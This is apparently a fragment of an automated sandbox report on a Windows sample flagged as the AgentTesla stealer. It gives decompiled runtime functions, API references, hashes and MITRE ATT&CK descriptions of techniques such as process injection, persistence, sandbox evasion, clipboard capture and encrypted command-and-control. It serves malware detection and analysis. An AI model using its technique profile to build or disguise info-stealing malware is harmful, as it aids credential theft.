0x0040440d
0x0040440f
0x00000000
0x00000000
0x00000000
0x00000000
0x004043f6
0x004043f6
0x00000000
0x004043f6
0x004043dd
0x004043dd
0x004043de
0x004043de
0x00404411
0x00404412
0x00404412
0x004043bd
0x004043c3
0x004043c7
0x0040441a
0x0040441b
0x00404421
0x00000000
0x00000000
0x00000000
0x004043c7
0x00404428
0x00404428
0x00404336
0x0040433c
0x00404340
0x0040438b
0x0040438c
0x00404396
0x00000000
0x00000000
0x00000000
0x00404340

APIs

GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
_abort.LIBCMT ref: 0040439E

Memory Dump Source

Source File: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 748d6134d9c6c0cb73fdca7d7eb4e83c201390a1d6e057c9cacbb9a7c1b02d9b
Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
Opcode Fuzzy Hash: 748d6134d9c6c0cb73fdca7d7eb4e83c201390a1d6e057c9cacbb9a7c1b02d9b
Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D

Uniqueness

Uniqueness Score: -1.00%

Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x004025ba
0x004025bf
0x004025cb
0x004025d0
0x004025d5
0x004025d7
0x004025e2
0x004025d9
0x004025d9
0x00000000
0x004025d9
0x004025cd
0x004025cd
0x004025cf
0x004025cf

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4

Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9

Memory Dump Source

Source File: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E

Uniqueness

Uniqueness Score: -1.00%

Function 00405575, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405575() {

				 *0x412e78 = GetCommandLineA();
				 *0x412e7c = GetCommandLineW();
				return 1;
			}

0x0040557b
0x00405586
0x0040558d

APIs

GetCommandLineA.KERNEL32 ref: 00405575
GetCommandLineW.KERNEL32 ref: 00405580

Strings

`3~, xrefs: 0040557B

Memory Dump Source

Source File: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: CommandLine
String ID: `3~
API String ID: 3253501508-4097846073
Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 3NeufRwoxF

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 00403225, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Function 004053AA, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Function 0040604C, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00405D7C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00405DA3, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Function 004035E3, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213
stringregistrylibraryCOMMON

Function 00402C5B, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00402F01, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Function 0040302C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryloaderCOMMON

Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Function 0040578B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Function 72B210A0, Relevance: 6.1, APIs: 4, Instructions: 81
filememoryCOMMON

Function 004031F1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Function 00406481, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Function 00406682, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Function 00406398, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Function 00405E9D, Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Function 004062EB, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Function 00406409, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Function 00406355, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 0040575C, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 0040573D, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 004031A8, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 004031DA, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 00404F61, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Function 00404772, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Function 00404275, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266
stringCOMMON

Function 00405AA7, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195
stringCOMMON

Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Function 00402630, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre